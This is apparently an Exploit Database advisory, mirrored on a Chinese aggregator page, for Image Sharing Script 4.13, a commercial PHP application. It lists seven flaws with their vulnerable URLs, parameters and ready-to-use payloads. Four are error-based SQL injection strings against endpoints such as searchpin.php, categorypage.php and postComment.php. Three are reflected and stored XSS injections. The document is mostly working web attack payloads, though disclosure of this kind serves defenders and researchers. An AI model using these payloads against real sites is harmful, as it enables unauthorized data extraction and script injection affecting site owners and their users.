Image Sharing Script 4.13 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： Hasan Emre Ozer
  日期： 2017-01-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41080/

• Exploit Title : Image Sharing Script v4.13 - Multiple Vulnerability
  Author : Hasan Emre Ozer
  Google Dork :-
  Date : 16/01/2017
  Type : webapps
  Platform: PHP
  Vendor Homepage : http://itechscripts.com/image-sharing-script/
  Sofware Price and Demo : $1250
  http://photo-sharing.itechscripts.com/
  
  --------------------------------
  Type: Reflected XSS
  Vulnerable URL: http://localhost/[PATH]/searchpin.php
  Vulnerable Parameters : q=
  Payload:"><img src=i onerror=prompt(1)>
  -------------------------------
  Type: Error Based Sql Injection
  Vulnerable URL:http://localhost/[PATH]/list_temp_photo_pin_upload.php
  Vulnerable Parameters: pid
  Method: GET
  Payload: ' AND (SELECT 2674 FROM(SELECT
  COUNT(*),CONCAT(0x717a717671,(SELECT
  (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
  -------------------------------
  Type: Error Based Sql Injection
  Vulnerable URL:http://localhost/[PATH]/categorypage.php
  Vulnerable Parameters: token
  Method: GET
  Payload: ' AND (SELECT 2674 FROM(SELECT
  COUNT(*),CONCAT(0x717a717671,(SELECT
  (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
  
  --------------------------------
  Type: Reflected XSS
  Vulnerable URL: http://localhost/[PATH]/categorypage.php
  Vulnerable Parameters : token
  Payload:"><img src=i onerror=prompt(1)>
  
  -------------------------------
  Type: Stored XSS
  Vulnerable URL: http://localhost/[PATH]/ajax-files/postComment.php
  Method: POST
  Vulnerable Parameters : &text=
  Payload:<img src=i onerror=prompt(1)>
  --------------------------------
  Type: Error Based Sql Injection
  Vulnerable URL:http://localhost/[PATH]/ajax-files/postComment.php
  Vulnerable Parameters: id
  Method: POST
  Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
  (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH
  ---------------------------------
  Type: Error Based Sql Injection
  Vulnerable URL:http://localhost/[PATH]//ajax-files/followBoard.php
  Vulnerable Parameters: brdId
  Method: POST
  Payload:' AND (SELECT 2674 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT
  (ELT(2674=2674,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvtH'='xvtH